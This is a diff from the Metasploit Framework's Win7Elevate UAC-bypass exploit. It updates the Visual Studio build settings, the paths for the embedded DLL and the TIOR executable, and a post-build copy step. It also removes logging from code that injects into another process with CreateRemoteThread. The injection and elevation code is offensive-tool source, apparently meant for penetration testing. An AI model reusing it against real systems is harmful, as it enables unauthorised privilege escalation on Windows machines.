{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
|
BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
vendored
Normal file → Executable file
BIN
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
vendored
Normal file → Executable file
Binary file not shown.
17
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
vendored
Normal file → Executable file
17
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
vendored
Normal file → Executable file
|
@ -61,22 +61,23 @@ END
|
||||||
|
|
||||||
#ifdef _DEBUG
|
#ifdef _DEBUG
|
||||||
|
|
||||||
|
// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#else // _DEBUG
|
#else // _DEBUG
|
||||||
|
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,25 +67,30 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -96,10 +105,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -119,10 +130,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -141,12 +154,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -155,6 +170,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -168,12 +186,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -182,6 +202,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="Resource.h" />
|
<ClInclude Include="Resource.h" />
|
||||||
|
@ -204,7 +227,10 @@
|
||||||
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ResourceCompile Include="Win7Elevate.rc" />
|
<ResourceCompile Include="Win7Elevate.rc">
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
|
35
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
vendored
Normal file → Executable file
35
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
vendored
Normal file → Executable file
|
@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (codeStartAdr >= codeEndAdr)
|
if (codeStartAdr >= codeEndAdr)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Unexpected function layout");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't get path to self");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (S_OK != hr)
|
if (S_OK != hr)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"SHGetFolderPath failed");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
if (hModKernel32 == 0)
|
if (hModKernel32 == 0)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't load kernel32.dll");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|| 0 == tfpWaitForSingleObject.f)
|
|| 0 == tfpWaitForSingleObject.f)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"Couldn't find API");
|
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
|
@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|
|
||||||
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
||||||
|
|
||||||
if (reme.AnyFailures())
|
if (!(reme.AnyFailures()))
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Remote allocation failed");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
||||||
|
|
||||||
if (hRemoteThread == 0)
|
if (hRemoteThread != 0)
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
L"Couldn't create remote thread",
|
|
||||||
L"CreateRemoteThread"));
|
|
||||||
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
if ( Redirector )
|
if ( Redirector )
|
||||||
Redirector();
|
Redirector();
|
||||||
|
@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
|
|
||||||
// See if it completed before the user asked to stop waiting.
|
// See if it completed before the user asked to stop waiting.
|
||||||
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
||||||
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
||||||
|
@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|
||||||
|
|
||||||
FreeLibrary(hModKernel32);
|
FreeLibrary(hModKernel32);
|
||||||
|
|
||||||
if (bThreadWaitFailure)
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Error waiting on the remote thread to complete");
|
|
||||||
}
|
|
||||||
else if (bThreadWaitSuccess)
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
|
|
||||||
CLogger::LogLine(L"Remote thread completed");
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
16
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
vendored
Normal file → Executable file
16
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
vendored
Normal file → Executable file
|
@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
|
||||||
if (hSnapshot == INVALID_HANDLE_VALUE)
|
if (hSnapshot == INVALID_HANDLE_VALUE)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
|
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
|
@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
|
||||||
{
|
{
|
||||||
DWORD dwErr = GetLastError();
|
DWORD dwErr = GetLastError();
|
||||||
|
